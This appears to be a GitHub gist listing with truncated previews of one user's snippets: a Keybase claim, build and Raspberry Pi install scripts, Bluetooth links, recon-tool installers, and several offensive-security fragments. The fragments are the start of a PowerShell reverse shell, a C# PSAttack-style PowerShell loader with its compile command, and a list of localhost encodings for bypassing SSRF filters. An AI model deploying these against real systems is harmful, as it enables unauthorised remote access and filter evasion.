I hereby claim:
- I am resistanceisuseless on github.
- I am matthewgriffiths (https://keybase.io/matthewgriffiths) on keybase.
- I have a public key ASD0g5wpxTHB7qHZ-T54myUl8i6hk6Z1CoGM_5v0-kkLXAo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| #!/bin/bash | |
| #requires wget(brew install wget) or replace wget with curl -I | |
| wget http://libdnet.googlecode.com/files/libdnet-1.12.tgz | |
| tar xfz libdnet-1.12.tgz | |
| cd libdnet-1.12 | |
| ./configure | |
| make | |
| sudo make install | |
| cd python | |
| sudo python setup.py install |
| wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20140902-1_all.deb | |
| wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb | |
| wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb | |
| dpkg -i raspi-config_20140902-1_all.deb | |
| dpkg -i lua5.1_5.1.5-4_armel.deb | |
| dpkg -i raspi-config_20121028_all.deb | |
| #http://rageweb.info/2013/03/21/raspi-config-in-kali/ |
| http://bluez.sourceforge.net/contrib/HOWTO-PAN | |
| https://github.com/raspberrypi/firmware/blob/master/boot/overlays/README | |
| https://askubuntu.com/questions/2573/can-i-use-my-computer-as-an-a2dp-receiver-bluetooth-speaker | |
| https://wiki.debian.org/BluetoothUser | |
| https://support.hifiberry.com/hc/en-us/articles/205377651-Configuring-Linux-4-x-or-higher | |
| https://www.linux.com/learn/weekend-project-personal-area-networking-bluetooth | |
| http://www.instructables.com/id/Multiroom-Client-With-Raspberry-Pi-ZERO-and-PHAT-D/ | |
| http://www.instructables.com/id/Turn-your-Raspberry-Pi-into-a-Portable-Bluetooth-A/ | |
| mode apt.list | |
| annotate match apt.package -- apt-cache pkgnames | |
| bindkey enter apt.package apt.list -- apt-cache show %(apt.package) | |
| bindkey d apt.package apt.list -- apt-cache depends %(apt.package) | |
| bindkey s apt.package apt.list -- apt-cache search %(apt.package) | |
| bindkey R apt.package apt.list -- apt-get remove %(apt.package) --assume-yes | |
| bindkey I apt.package apt.list -- !?apt-get install %(apt.package) --assume-yes | |
| end |
| #!/bin/bash | |
| #note: This is a pretty sloppy script in someplaces so use at your own risk. | |
| ######################################## | |
| # Configuration | |
| ######################################## | |
| InstallPath=/home/static/Tools | |
| ######################################## | |
| mkdir -p $InstallPath/{temp,Scripts/Recon} | |
| echo -e "\e[92m[*] Starting Install... [*]" |
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
| //Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
| //Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
| //1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
| using System; | |
| using System.Reflection; | |
| namespace PSA64 | |
| { | |
| class Program | |
| { |
| ######################################## | |
| # Configuration | |
| ######################################## | |
| #Install Path needs /Scripts/Recon | |
| InstallPath=/home/static/Tools | |
| ######################################## | |
| echo -e "\e[92m[*] Install Go Packages [*]" | |
| #Aquatone Website Image Snapshot - https://michenriksen.com/blog/aquatone-now-in-go/ | |
| go get -u "github.com/michenriksen/aquatone" |
| 127.0.0.1 | |
| 127.0.1.3 | |
| 0 | |
| 127.1 | |
| 127.0.1 | |
| localhost | |
| 1.0.0.127.in-addr.arpa | |
| 01111111000000000000000000000001 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0.0.01 |